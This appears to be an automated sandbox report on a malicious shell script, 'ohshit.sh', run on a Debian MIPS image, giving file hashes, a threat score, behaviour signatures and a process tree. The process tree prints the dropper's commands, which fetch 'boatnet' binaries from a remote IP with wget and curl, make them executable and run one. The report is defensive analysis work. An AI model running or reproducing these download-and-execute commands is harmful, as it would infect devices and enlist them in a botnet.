Analysis

  • max time kernel
    60s
  • max time network
    64s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    31-08-2024 21:05

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    fefdf2b7ece4d55bd47778b420f84011

  • SHA1

    2823096e0538910f9b57ff9bae007ec655520fc3

  • SHA256

    3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb

  • SHA512

    b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:713
    • /usr/bin/wget
      wget http://94.156.71.225/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:719
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:740
    • /bin/cat
      cat boatnet.x86
      2⤵
        PID:820
      • /bin/chmod
        chmod +x boatnet.x86 ohshit.sh WTF
        2⤵
          PID:821
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          PID:822
        • /usr/bin/wget
          wget http://94.156.71.225/hiddenbin/boatnet.mips
          2⤵
          • Writes file to tmp directory
          PID:824
        • /usr/bin/curl
          curl -O http://94.156.71.225/hiddenbin/boatnet.mips
          2⤵
          • Reads runtime system information
          PID:825

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/boatnet.x86

        Filesize

        36KB

        MD5

        ba2cb5b8715ba94c39e24e75a34d0ea0

        SHA1

        7182bf3b0e14e5224e741c15174c6e93f00df444

        SHA256

        01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33

        SHA512

        0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d